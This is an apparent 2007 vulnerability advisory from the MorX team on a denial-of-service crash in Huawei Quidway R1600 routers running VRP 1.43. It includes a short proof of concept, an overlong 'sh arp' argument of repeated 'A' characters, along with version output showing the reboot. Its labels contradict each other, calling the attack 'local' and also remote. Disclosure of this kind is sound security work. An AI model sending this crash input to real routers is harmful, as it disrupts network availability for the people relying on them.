The Quidway Router local DOS

Credit: handrix cobra
Risk: Low
Local: No
Remote: Yes

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Quidway Router Local DOS attack By: Handrix <handrix_at_morx_org> 18 January 2007 MorX security research team Description: The Quidway Router's firmware is vulnerable to a local denial of service attack, there are a request to turn off the engine. Simple poc realeased by : Router>sh arp AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA After the Router crash, wait a while and type "sh version" to verify this bug: Router>sh ver VRP (tm) software, Version 1.43 2500E-003 Copyright (c) 1997-2002 HUAWEI TECH CO., LTD. Compiled 20:53:47, Nov 7 2002 , Quidway R1600 uptime is 0 days 0 hours 1 minutes 3 seconds. Quidway R1600 with 1 68360 Processor 16 Mbytes DRAM 4608 Kbytes Flash Memory hardware version is 1.0 Vendor: Huawei Vulnerable version: Quidway R1600 (Versatile Routing Platform, version 1.43 2500E-003) Maybe others. -------------- next part -------------- An HTML attachment was scrubbed... URL:

